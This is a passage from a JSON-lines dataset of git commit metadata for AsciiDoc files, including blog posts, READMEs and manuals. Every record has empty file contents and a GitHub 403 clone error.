/elasticsearch,feiqitian\/elasticsearch,jango2015\/elasticsearch,btiernay\/elasticsearch,EasonYi\/elasticsearch,easonC\/elasticsearch,mjason3\/elasticsearch,elasticdog\/elasticsearch,sreeramjayan\/elasticsearch,trangvh\/elasticsearch,LeoYao\/elasticsearch,hirdesh2008\/elasticsearch,JSCooke\/elasticsearch,a2lin\/elasticsearch,a2lin\/elasticsearch,springning\/elasticsearch,karthikjaps\/elasticsearch,Helen-Zhao\/elasticsearch,MetSystem\/elasticsearch,kalburgimanjunath\/elasticsearch,ivansun1010\/elasticsearch,yanjunh\/elasticsearch,dataduke\/elasticsearch,18098924759\/elasticsearch,sscarduzio\/elasticsearch,bestwpw\/elasticsearch,MisterAndersen\/elasticsearch,MjAbuz\/elasticsearch,girirajsharma\/elasticsearch,xpandan\/elasticsearch,infusionsoft\/elasticsearch,vroyer\/elasticassandra,adrianbk\/elasticsearch,lightslife\/elasticsearch,kaneshin\/elasticsearch,girirajsharma\/elasticsearch,Kakakakakku\/elasticsearch,hafkensite\/elasticsearch,Kakakakakku\/elasticsearch,mgalushka\/elasticsearch,JervyShi\/elasticsearch,kcompher\/elasticsearch,xingguang2013\/elasticsearch,cwurm\/elasticsearch,adrianbk\/elasticsearch,kcompher\/elasticsearch,PhaedrusTheGreek\/elasticsearch,andrewvc\/elasticsearch,Siddartha07\/elasticsearch,coding0011\/elasticsearch,tebriel\/elasticsearch,brwe\/elasticsearch,tahaemin\/elasticsearch,jimhooker2002\/elasticsearch,kalimatas\/elasticsearch,C-Bish\/elasticsearch,yanjunh\/elasticsearch,chirilo\/elasticsearch,aparo\/elasticsearch,fekaputra\/elasticsearch,chirilo\/elasticsearch,uboness\/elasticsearch,xpandan\/elasticsearch,lchennup\/elasticsearch,fooljohnny\/elasticsearch,mortonsykes\/elasticsearch,naveenhooda2000\/elasticsearch,winstonewert\/elasticsearch,ydsakyclguozi\/elasticsearch,alexksikes\/elasticsearch,Siddartha07\/elasticsearch,clintongormley\/elasticsearch,smflorentino\/elasticsearch,wbowling\/elasticsearch,ivansun1010\/elasticsearch,obourgain\/elasticsearch,btiernay\/elasticsearch,truemped\/elasticsearch,nezirus\/elasticsearch,amit-shar\/elasticsearch,Shepard1212\/elasticsearch,koxa29\/elasticsearch,fooljohnny\/elasticsearch,javachengwc\/elasticsearch,sreeramjayan\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,masterweb121\/elasticsearch,nilabhsagar\/elasticsearch,ricardocerq\/elasticsearch,onegambler\/elasticsearch,umeshdangat\/elasticsearch,F0lha\/elasticsearch,iantruslove\/elasticsearch,LeoYao\/elasticsearch,overcome\/elasticsearch,tebriel\/elasticsearch,sreeramjayan\/elasticsearch,F0lha\/elasticsearch,opendatasoft\/elasticsearch,snikch\/elasticsearch,ImpressTV\/elasticsearch,wbowling\/elasticsearch,nilabhsagar\/elasticsearch,njlawton\/elasticsearch,liweinan0423\/elasticsearch,szroland\/elasticsearch,dataduke\/elasticsearch,tsohil\/elasticsearch,jango2015\/elasticsearch,s1monw\/elasticsearch,robin13\/elasticsearch,libosu\/elasticsearch,aparo\/elasticsearch,Microsoft\/elasticsearch,yynil\/elasticsearch,uschindler\/elasticsearch,MaineC\/elasticsearch,mohit\/elasticsearch,ajhalani\/elasticsearch,andrestc\/elasticsearch,mortonsykes\/elasticsearch,Flipkart\/elasticsearch,aglne\/elasticsearch,xuzha\/elasticsearch,cnfire\/elasticsearch-1,TonyChai24\/ESSource,uschindler\/elasticsearch,hafkensite\/elasticsearch,amaliujia\/elasticsearch,karthikjaps\/elasticsearch,Clairebi\/ElasticsearchClone,weipinghe\/elasticsearch,awislowski\/elasticsearch,karthikjaps\/elasticsearch,fforbeck\/elasticsearch,raishiv\/elasticsearch,hirdesh2008\/elasticsearch,cnfire\/elasticsearch-1,golubev\/elasticsearch,Stacey-Gammon\/elasticsearch,mikemccand\/elasticsearch,hanswang\/elasticsearch,ImpressTV\/elasticsearch,gmarz\/elasticsearch,wuranbo\/elasticsearch,franklanganke\/elasticsearch,robin13\/elasticsearch,iacdingping\/elasticsearch,kevinkluge\/elasticsearch,rmuir\/elasticsearch,infusionsoft\/elasticsearch,StefanGor\/elasticsearch,Asimov4\/elasticsearch,njlawton\/elasticsearch,khiraiwa\/elasticsearch,vrkansagara\/elasticsearch,wayeast\/elasticsearch,Shepard1212\/elasticsearch,F0lha\/elasticsearch,amit-shar\/elasticsearch,petabytedata\/elasticsearch,dpursehouse\/elasticsearch,obourgain\/elasticsearch,Shekharrajak\/elasticsearch,janmejay\/elasticsearch,slavau\/elasticsearch,Shepard1212\/elasticsearch,strapdata\/elassandra,lydonchandra\/elasticsearch,ckclark\/elasticsearch,LewayneNaidoo\/elasticsearch,brandonkearby\/elasticsearch,humandb\/elasticsearch,geidies\/elasticsearch,scorpionvicky\/elasticsearch,Ansh90\/elasticsearch,Liziyao\/elasticsearch,sauravmondallive\/elasticsearch,abibell\/elasticsearch,hanst\/elasticsearch,jaynblue\/elasticsearch,amit-shar\/elasticsearch,sarwarbhuiyan\/elasticsearch,MaineC\/elasticsearch,peschlowp\/elasticsearch,linglaiyao1314\/elasticsearch,artnowo\/elasticsearch,yanjunh\/elasticsearch,fernandozhu\/elasticsearch,vorce\/es-metrics,palecur\/elasticsearch,lchennup\/elasticsearch,jbertouch\/elasticsearch,PhaedrusTheGreek\/elasticsearch,xingguang2013\/elasticsearch,milodky\/elasticsearch,kalimatas\/elasticsearch,wuranbo\/elasticsearch,TonyChai24\/ESSource,hanst\/elasticsearch,jango2015\/elasticsearch,sneivandt\/elasticsearch,weipinghe\/elasticsearch,Widen\/elasticsearch,kenshin233\/elasticsearch,infusionsoft\/elasticsearch,yynil\/elasticsearch,spiegela\/elasticsearch,tcucchietti\/elasticsearch,jchampion\/elasticsearch,pablocastro\/elasticsearch,franklanganke\/elasticsearch,JSCooke\/elasticsearch,karthikjaps\/elasticsearch,mute\/elasticsearch,iamjakob\/elasticsearch,SaiprasadKrishnamurthy\/elasticsearch,vietlq\/elasticsearch,petabytedata\/elasticsearch,wuranbo\/elasticsearch,Microsoft\/elasticsearch,IanvsPoplicola\/elasticsearch,dylan8902\/elasticsearch,MisterAndersen\/elasticsearch,ydsakyclguozi\/elasticsearch,awislowski\/elasticsearch,mapr\/elasticsearch,kenshin233\/elasticsearch,HarishAtGitHub\/elasticsearch,djschny\/elasticsearch,vvcephei\/elasticsearch,hanst\/elasticsearch,raishiv\/elasticsearch,tahaemin\/elasticsearch,yynil\/elasticsearch,sposam\/elasticsearch,masterweb121\/elasticsearch,dpursehouse\/elasticsearch,peschlowp\/elasticsearch,glefloch\/elasticsearch,masaruh\/elasticsearch,s1monw\/elasticsearch,girirajsharma\/elasticsearch,wenpos\/elasticsearch,sposam\/elasticsearch,Asimov4\/elasticsearch,wayeast\/elasticsearch,nomoa\/elasticsearch,hechunwen\/elasticsearch,MichaelLiZhou\/elasticsearch,Uiho\/elasticsearch,caengcjd\/elasticsearch,slavau\/elasticsearch,hydro2k\/elasticsearch,gingerwizard\/elasticsearch,clintongormley\/elasticsearch,schonfeld\/elasticsearch,Rygbee\/elasticsearch,clintongormley\/elasticsearch,truemped\/elasticsearch,Fsero\/elasticsearch,bawse\/elasticsearch,sposam\/elasticsearch,maddin2016\/elasticsearch,Ansh90\/elasticsearch,kubum\/elasticsearch,tcucchietti\/elasticsearch,mcku\/elasticsearch,phani546\/elasticsearch,jbertouch\/elasticsearch,dantuffery\/elasticsearch,Clairebi\/ElasticsearchClone,davidvgalbraith\/elasticsearch,amaliujia\/elasticsearch,apepper\/elasticsearch,sneivandt\/elasticsearch,Shekharrajak\/elasticsearch,nilabhsagar\/elasticsearch,abibell\/elasticsearch,episerver\/elasticsearch,markllama\/elasticsearch,phani546\/elasticsearch,sreeramjayan\/elasticsearch,hanswang\/elasticsearch,ckclark\/elasticsearch,huanzhong\/elasticsearch,ESamir\/elasticsearch,hydro2k\/elasticsearch,kalimatas\/elasticsearch,Uiho\/elasticsearch,wbowling\/elasticsearch,yongminxia\/elasticsearch,franklanganke\/elasticsearch,mkis-\/elasticsearch,AshishThakur\/elasticsearch,zkidkid\/elasticsearch,hydro2k\/elasticsearch,fekaputra\/elasticsearch,Fsero\/elasticsearch,Widen\/elasticsearch,fred84\/elasticsearch,springning\/elasticsearch,fernandozhu\/elasticsearch,heng4fun\/elasticsearch,peschlowp\/elasticsearch,vrkansagara\/elasticsearch,loconsolutions\/elasticsearch,KimTaehee\/elasticsearch,mmaracic\/elasticsearch,Kakakakakku\/elasticsearch,milodky\/elasticsearch,liweinan0423\/elasticsearch,mohsinh\/elasticsearch,combinatorist\/elasticsearch,Ansh90\/elasticsearch,mcku\/elasticsearch,nezirus\/elasticsearch,janmejay\/elasticsearch,cwurm\/elasticsearch,khiraiwa\/elasticsearch,Brijeshrpatel9\/elasticsearch,SergVro\/elasticsearch,dantuffery\/elasticsearch,jimhooker2002\/elasticsearch,sneivandt\/elasticsearch,Charlesdong\/elasticsearch,episerver\/elasticsearch,MichaelLiZhou\/elasticsearch,Kakakakakku\/elasticsearch,jbertouch\/elasticsearch,MetSystem\/elasticsearch,tahaemin\/elasticsearch,IanvsPoplicola\/elasticsearch,ImpressTV\/elasticsearch,milodky\/elasticsearch,hirdesh2008\/elasticsearch,sauravmondallive\/elasticsearch,AndreKR\/elasticsearch,VukDukic\/elasticsearch,wenpos\/elasticsearch,humandb\/elasticsearch,kenshin233\/elasticsearch,rhoml\/elasticsearch,caengcjd\/elasticsearch,cnfire\/elasticsearch-1,milodky\/elasticsearch,sauravmondallive\/elasticsearch,skearns64\/elasticsearch,abhijitiitr\/es,kalburgimanjunath\/elasticsearch,mapr\/elasticsearch,scottsom\/elasticsearch,lzo\/elasticsearch-1,infusionsoft\/elasticsearch,scorpionvicky\/elasticsearch,HarishAtGitHub\/elasticsearch,linglaiyao1314\/elasticsearch,weipinghe\/elasticsearch,mgalushka\/elasticsearch,anti-social\/elasticsearch,SergVro\/elasticsearch,Shekharrajak\/elasticsearch,petmit\/elasticsearch,nomoa\/elasticsearch,AndreKR\/elasticsearch,lightslife\/elasticsearch,gingerwizard\/elasticsearch,tkssharma\/elasticsearch,amit-shar\/elasticsearch,nrkkalyan\/elasticsearch,feiqitian\/elasticsearch,apepper\/elasticsearch,kaneshin\/elasticsearch,janmejay\/elasticsearch,GlenRSmith\/elasticsearch,golubev\/elasticsearch,umeshdangat\/elasticsearch,zeroctu\/elasticsearch,i-am-Nathan\/elasticsearch,nazarewk\/elasticsearch,nellicus\/elasticsearch,pritishppai\/elasticsearch,cwurm\/elasticsearch,ouyangkongtong\/elasticsearch,strapdata\/elassandra,ESamir\/elasticsearch,mgalushka\/elasticsearch,MjAbuz\/elasticsearch,masterweb121\/elasticsearch,bawse\/elasticsearch,onegambler\/elasticsearch,easonC\/elasticsearch,mikemccand\/elasticsearch,NBSW\/elasticsearch,kunallimaye\/elasticsearch,andrejserafim\/elasticsearch,sarwarbhuiyan\/elasticsearch,yongminxia\/elasticsearch,rmuir\/elasticsearch,onegambler\/elasticsearch,kingaj\/elasticsearch,lks21c\/elasticsearch,mm0\/elasticsearch,huanzhong\/elasticsearch,HonzaKral\/elasticsearch,JervyShi\/elasticsearch,s1monw\/elasticsearch,lydonchandra\/elasticsearch,nrkkalyan\/elasticsearch,mohsinh\/elasticsearch,LeoYao\/elasticsearch,vvcephei\/elasticsearch,linglaiyao1314\/elasticsearch,cwurm\/elasticsearch,cnfire\/elasticsearch-1,springning\/elasticsearch,wittyameta\/elasticsearch,sarwarbhuiyan\/elasticsearch,jimczi\/elasticsearch,sc0ttkclark\/elasticsearch,Uiho\/elasticsearch,rmuir\/elasticsearch,naveenhooda2000\/elasticsearch,nknize\/elasticsearch,mjason3\/elasticsearch,ZTE-PaaS\/elasticsearch,kalburgimanjunath\/elasticsearch,franklanganke\/elasticsearch,GlenRSmith\/elasticsearch,VukDukic\/elasticsearch,kimimj\/elasticsearch,polyfractal\/elasticsearch,jsgao0\/elasticsearch,fred84\/elasticsearch,mohit\/elasticsearch,Siddartha07\/elasticsearch,chirilo\/elasticsearch,kingaj\/elasticsearch,glefloch\/elasticsearch,fernandozhu\/elasticsearch,smflorentino\/elasticsearch,Ansh90\/elasticsearch,gingerwizard\/elasticsearch,hirdesh2008\/elasticsearch,yuy168\/elasticsearch,humandb\/elasticsearch,onegambler\/elasticsearch,cnfire\/elasticsearch-1,knight1128\/elasticsearch,wangyuxue\/elasticsearch,vietlq\/elasticsearch,overcome\/elasticsearch,loconsolutions\/elasticsearch,jimczi\/elasticsearch,djschny\/elasticsearch,wayeast\/elasticsearch,jimczi\/elasticsearch,Uiho\/elasticsearch,zhiqinghuang\/elasticsearch,fubuki\/elasticsearch,jchampion\/elasticsearch,Charlesdong\/elasticsearch,JervyShi\/elasticsearch,knight1128\/elasticsearch,obourgain\/elasticsearch,nazarewk\/elasticsearch,qwerty4030\/elasticsearch,apepper\/elasticsearch,brandonkearby\/elasticsearch,aglne\/elasticsearch,glefloch\/elasticsearch,kimimj\/elasticsearch,alexkuk\/elasticsearch,iantruslove\/elasticsearch,mapr\/elasticsearch,rajanm\/elasticsearch,vrkansagara\/elasticsearch,gingerwizard\/elasticsearch,lmtwga\/elasticsearch,mmaracic\/elasticsearch,myelin\/elasticsearch,sarwarbhuiyan\/elasticsearch,kubum\/elasticsearch,khiraiwa\/elasticsearch,sjohnr\/elasticsearch,NBSW\/elasticsearch,Collaborne\/elasticsearch,avikurapati\/elasticsearch,sposam\/elasticsearch,MaineC\/elasticsearch,himanshuag\/elasticsearch,hanswang\/elasticsearch,mnylen\/elasticsearch,koxa29\/elasticsearch,likaiwalkman\/elasticsearch,rajanm\/elasticsearch,infusionsoft\/elasticsearch,ThiagoGarciaAlves\/elasticsearch,lmtwga\/elasticsearch,yongminxia\/elasticsearch","old_file":"docs\/ruby\/index.asciidoc","new_file":"docs\/ruby\/index.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/ouyangkongtong\/elasticsearch.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"fbd63a883e00428d1b386f96a6fb890ca74a2fe7","subject":"Update 2015-10-25-Back-to-Basic.adoc","message":"Update 2015-10-25-Back-to-Basic.adoc","repos":"gilangdanu\/blog,gilangdanu\/blog,gilangdanu\/blog","old_file":"_posts\/2015-10-25-Back-to-Basic.adoc","new_file":"_posts\/2015-10-25-Back-to-Basic.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gilangdanu\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"64a3bec9e3b1e8634390716105d3642f8e13b726","subject":"Renamed '_posts\/2019-01-09-TWCTF-2017-BabyDLP-BabyRSA-3.adoc' to '_posts\/2017-01-09-TWCTF-2017-BabyDLP-BabyRSA-3.adoc'","message":"Renamed '_posts\/2019-01-09-TWCTF-2017-BabyDLP-BabyRSA-3.adoc' to '_posts\/2017-01-09-TWCTF-2017-BabyDLP-BabyRSA-3.adoc'","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2017-01-09-TWCTF-2017-BabyDLP-BabyRSA-3.adoc","new_file":"_posts\/2017-01-09-TWCTF-2017-BabyDLP-BabyRSA-3.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"64481bee03f79f61ecbc3e72615896d661690af2","subject":"Update 2016-08-29-HITB-Singapore-A-few-cryptography-challenge-writeups.adoc","message":"Update 2016-08-29-HITB-Singapore-A-few-cryptography-challenge-writeups.adoc","repos":"cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io,cothan\/cothan.github.io","old_file":"_posts\/2016-08-29-HITB-Singapore-A-few-cryptography-challenge-writeups.adoc","new_file":"_posts\/2016-08-29-HITB-Singapore-A-few-cryptography-challenge-writeups.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/cothan\/cothan.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b1a25eb85087931f30053260f008adea560a129e","subject":"Update 2016-08-28-Not-mine-to-love.adoc","message":"Update 2016-08-28-Not-mine-to-love.adoc","repos":"2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io,2wce\/2wce.github.io","old_file":"_posts\/2016-08-28-Not-mine-to-love.adoc","new_file":"_posts\/2016-08-28-Not-mine-to-love.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/2wce\/2wce.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"35f93e0a3509c7b3fceb2b883a20ac78fad46d37","subject":"Update 2017-02-24-Chrome-Extension.adoc","message":"Update 2017-02-24-Chrome-Extension.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-02-24-Chrome-Extension.adoc","new_file":"_posts\/2017-02-24-Chrome-Extension.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ade82bd0b04a3282a538d99b3deaaf790e5bc42d","subject":"Document the change from #921 in the manual.","message":"Document the change from #921 in the manual.\n","repos":"automeka\/ninja,jimon\/ninja,autopulated\/ninja,automeka\/ninja,dorgonman\/ninja,mohamed\/ninja,Qix-\/ninja,Ju2ender\/ninja,moroten\/ninja,hnney\/ninja,hnney\/ninja,vvvrrooomm\/ninja,colincross\/ninja,hnney\/ninja,juntalis\/ninja,nafest\/ninja,atetubou\/ninja,ThiagoGarciaAlves\/ninja,martine\/ninja,atetubou\/ninja,colincross\/ninja,maruel\/ninja,ndsol\/subninja,mydongistiny\/ninja,mydongistiny\/ninja,mgaunard\/ninja,moroten\/ninja,Ju2ender\/ninja,ThiagoGarciaAlves\/ninja,juntalis\/ninja,Maratyszcza\/ninja-pypi,ninja-build\/ninja,ilor\/ninja,mohamed\/ninja,AoD314\/ninja,atetubou\/ninja,AoD314\/ninja,mydongistiny\/ninja,fuchsia-mirror\/third_party-ninja,bradking\/ninja,liukd\/ninja,ignatenkobrain\/ninja,nicolasdespres\/ninja,jimon\/ninja,lizh06\/ninja,sxlin\/dist_ninja,dorgonman\/ninja,ilor\/ninja,bmeurer\/ninja,Qix-\/ninja,sxlin\/dist_ninja,colincross\/ninja,iwadon\/ninja,Ju2ender\/ninja,ilor\/ninja,tfarina\/ninja,nico\/ninja,dorgonman\/ninja,bradking\/ninja,moroten\/ninja,automeka\/ninja,maruel\/ninja,iwadon\/ninja,martine\/ninja,autopulated\/ninja,autopulated\/ninja,vvvrrooomm\/ninja,kissthink\/ninja,autopulated\/ninja,sgraham\/ninja,mydongistiny\/ninja,atetubou\/ninja,ninja-build\/ninja,moroten\/ninja,AoD314\/ninja,mgaunard\/ninja,synaptek\/ninja,iwadon\/ninja,ndsol\/subninja,sgraham\/ninja,nicolasdespres\/ninja,Qix-\/ninja,ndsol\/subninja,nico\/ninja,Maratyszcza\/ninja-pypi,tfarina\/ninja,kissthink\/ninja,sxlin\/dist_ninja,maruel\/ninja,tfarina\/ninja,Qix-\/ninja,vvvrrooomm\/ninja,bmeurer\/ninja,synaptek\/ninja,mgaunard\/ninja,maruel\/ninja,jimon\/ninja,nicolasdespres\/ninja,synaptek\/ninja,dorgonman\/ninja,nicolasdespres\/ninja,juntalis\/ninja,ninja-build\/ninja,martine\/ninja,ignatenkobrain\/ninja,bradking\/ninja,sxlin\/dist_ninja,hnney\/ninja,automeka\/ninja,bmeurer\/ninja,lizh06\/ninja,sxlin\/dist_ninja,tfarina\/ninja,mohamed\/ninja,mgaunard\/ninja,ignatenkobrain\/ninja,fuchsia-mirror\/third_party-ninja,ThiagoGarciaAlves\/ninja,kissthink\/ninja,kissthink\/ninja,bmeurer\/ninja,lizh06\/ninja,vvvrrooomm\/ninja,nico\/ninja,ninja-build\/ninja,sgraham\/ninja,mohamed\/ninja,lizh06\/ninja,iwadon\/ninja,nafest\/ninja,ignatenkobrain\/ninja,martine\/ninja,nafest\/ninja,nafest\/ninja,fuchsia-mirror\/third_party-ninja,sxlin\/dist_ninja,ilor\/ninja,liukd\/ninja,liukd\/ninja,ThiagoGarciaAlves\/ninja,sgraham\/ninja,fuchsia-mirror\/third_party-ninja,nico\/ninja,juntalis\/ninja,AoD314\/ninja,sxlin\/dist_ninja,Ju2ender\/ninja,jimon\/ninja,ndsol\/subninja,bradking\/ninja,Maratyszcza\/ninja-pypi,Maratyszcza\/ninja-pypi,colincross\/ninja,liukd\/ninja,synaptek\/ninja","old_file":"doc\/manual.asciidoc","new_file":"doc\/manual.asciidoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nafest\/ninja.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"b63db85894912d358c3596b047812210b6ec7969","subject":"Ricodificato il ritorno a capo: dos2unix","message":"Ricodificato il ritorno a capo: dos2unix\n","repos":"gionatamassibenincasa\/scrittura_con_asciidoc,gionatamassibenincasa\/scrittura_con_asciidoc,gionatamassibenincasa\/scrittura_con_asciidoc","old_file":"scrittura_ts_asciidoc.adoc","new_file":"scrittura_ts_asciidoc.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gionatamassibenincasa\/scrittura_con_asciidoc.git\/': The requested URL returned error: 403\n","license":"bsd-3-clause","lang":"AsciiDoc"} {"commit":"d1f0014516bc1ba6341989fb6f33f3f605e1d7fe","subject":"Update 2017-01-02-Happy-New-Year.adoc","message":"Update 2017-01-02-Happy-New-Year.adoc","repos":"scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io,scriptindex\/scriptindex.github.io","old_file":"_posts\/2017-01-02-Happy-New-Year.adoc","new_file":"_posts\/2017-01-02-Happy-New-Year.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scriptindex\/scriptindex.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6b8a4509cb1f388784e43c91b60e567703f12613","subject":"job #12519 add implementation note","message":"job #12519 add implementation note\n","repos":"xtuml\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,leviathan747\/bridgepoint,cortlandstarrett\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,cortlandstarrett\/bridgepoint,xtuml\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint,leviathan747\/bridgepoint,xtuml\/bridgepoint,leviathan747\/bridgepoint,xtuml\/bridgepoint,xtuml\/bridgepoint,lwriemen\/bridgepoint,cortlandstarrett\/bridgepoint,leviathan747\/bridgepoint,lwriemen\/bridgepoint","old_file":"doc-bridgepoint\/notes\/12519_import_from_int.int.adoc","new_file":"doc-bridgepoint\/notes\/12519_import_from_int.int.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xtuml\/bridgepoint.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"dcfe77ecdec52b79dfb4a93b7b7707f4acadf80b","subject":"Added README document.","message":"Added README document.\n","repos":"nevenc-pivotal\/pcf-environment-performance-test","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/nevenc-pivotal\/pcf-environment-performance-test.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"6a6bf83e34b54ed83c4ce8b179ee624b1096c27c","subject":"fix(doc): update json sample","message":"fix(doc): update json sample\n","repos":"gravitee-io\/gravitee-policy-authentication","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/gravitee-io\/gravitee-policy-authentication.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"a766ce6e4c919e546fdeab7598d4fbb61e2e6902","subject":"Close #22 by fixing typo.","message":"Close #22 by fixing typo.\n","repos":"supriyantomaftuh\/python_api,supriyantomaftuh\/python_api","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/supriyantomaftuh\/python_api.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"469bb90033a275d728f7577437c0cb240997c5e2","subject":"Added readme.","message":"Added readme.\n","repos":"chordlove\/chordlove,chordlove\/chordlove,chordlove\/chordlove","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/chordlove\/chordlove.git\/': The requested URL returned error: 403\n","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"d52973ce1892d24eff2008bc3bf3875ecc947eb6","subject":"Initial commit","message":"Initial commit\n","repos":"jirutka\/asciidoctor-html5,jirutka\/asciidoctor-html5","old_file":"README.adoc","new_file":"README.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jirutka\/asciidoctor-html5.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"843fd8bc3843f41f3b7bac40e6d0fbc3aae33a84","subject":"Update 2018-06-08-Swift-Firestore.adoc","message":"Update 2018-06-08-Swift-Firestore.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-08-Swift-Firestore.adoc","new_file":"_posts\/2018-06-08-Swift-Firestore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"eb573e1f300926b5fc9ffc8b3450c2b064f87330","subject":"Update 2018-09-06-Test-for-ganjalf.adoc","message":"Update 2018-09-06-Test-for-ganjalf.adoc","repos":"anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog,anthonny\/personal-blog","old_file":"_posts\/2018-09-06-Test-for-ganjalf.adoc","new_file":"_posts\/2018-09-06-Test-for-ganjalf.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/anthonny\/personal-blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f6fb5e784f00f260ae619d086bb2ec6488f6d007","subject":"Update 2017-01-14-Life-Death-Life.adoc","message":"Update 2017-01-14-Life-Death-Life.adoc","repos":"seatones\/seatones.github.io,seatones\/seatones.github.io,seatones\/seatones.github.io,seatones\/seatones.github.io","old_file":"_posts\/2017-01-14-Life-Death-Life.adoc","new_file":"_posts\/2017-01-14-Life-Death-Life.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/seatones\/seatones.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"db8078b906da519c1a835db5814a8081da246b48","subject":"Update 2018-06-08-Swift-Firestore.adoc","message":"Update 2018-06-08-Swift-Firestore.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2018-06-08-Swift-Firestore.adoc","new_file":"_posts\/2018-06-08-Swift-Firestore.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"31d0fbeba3b0187722194289b8bdadca59df8b54","subject":"Update 2019-01-31-language-basics.adoc","message":"Update 2019-01-31-language-basics.adoc","repos":"lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io,lonelee-kirsi\/lonelee-kirsi.github.io","old_file":"_posts\/2019-01-31-language-basics.adoc","new_file":"_posts\/2019-01-31-language-basics.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/lonelee-kirsi\/lonelee-kirsi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"a603835350f39c798382422842574b8da44af49a","subject":"Update 2016-11-10-On-choosing-careers.adoc","message":"Update 